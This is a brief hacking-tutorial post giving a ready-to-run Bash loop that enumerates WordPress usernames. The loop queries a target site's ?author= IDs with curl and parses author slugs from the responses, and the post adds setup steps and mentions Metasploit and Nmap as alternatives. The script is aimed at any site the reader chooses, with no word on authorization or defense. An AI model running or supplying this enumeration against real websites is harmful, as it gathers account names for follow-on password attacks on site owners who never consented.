Wordpress Username Enumeration

 In Wordpress we can do a username enumeration in several ways. We can do it via Metasploit or Nmap NSE Script. But if both of these are not available or we want to use another simpler method, here is one mentioned below.

A Bash Script to enumerate Wordpress usernames.

Copy the below Bash code text into a .sh file.
Change the website to URL to your desired URL.
Change the range of user ids default is 1 to 20.
Then chmod the file to make it executable ( chmod +x filename.sh)(in linux terminal)
and run ./filename.sh.

BASH Code:

 for i in {1..20}; do curl -s -L -i http://www.your-desired-website/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

CYB3RTR0N , 574r570rm

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